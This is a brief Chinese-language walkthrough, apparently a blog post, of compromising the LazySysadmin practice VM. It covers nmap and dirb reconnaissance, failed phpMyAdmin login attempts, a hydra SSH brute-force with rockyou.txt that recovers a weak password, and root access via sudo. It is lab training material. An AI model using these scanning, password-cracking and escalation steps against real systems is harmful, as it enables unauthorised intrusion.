1. 主机发现+端口扫描+目录扫描+敏感信息获取
1.1. 主机发现
nmap -sn 192.168.43.0/24|grep -B 2 '08:00:27:94:96:64'
1.2. 端口扫描
nmap -p- 192.168.43.221
1.3. 目录扫描
dirb http://192.168.43.221
1.4. 敏感信息收集
2. WEB打点寻找漏洞点
2.1. 访问80端口
1.逐个拼接扫描到的目录,/robots.txt -> 逐个拼接/robots.txt的内容 ->【无用】
2.拼接/phpmyadmin/ -> 尝试万能密码绕过和弱密码爆破 -> 【无果】
3.拼接/wordpress,查看页面信息???用户名是togie吗?
2.2. 破解账号密码
1.已知用户可能为【togie】用hydra,爆破ssh密码 -> 账号密码【togie:12345】
cd /usr/share/wordlists
ls -al
gunzip rockyou.txt.gz #解压字典
hydra -l togie -P /usr/share/wordlists/rockyou.txt ssh://192.168.43.221
2.尝试连接ssh,
ssh [email protected]
3. 权限提升
老规矩,查看用户权限 -> 显示all ->尝试直接提权 ->成功
sudo -l
sudo su
标签:txt,打靶,192.168,拼接,43.221,ssh,togie,权限,Lazysysadmin
From: https://blog.csdn.net/weixin_52487093/article/details/140916558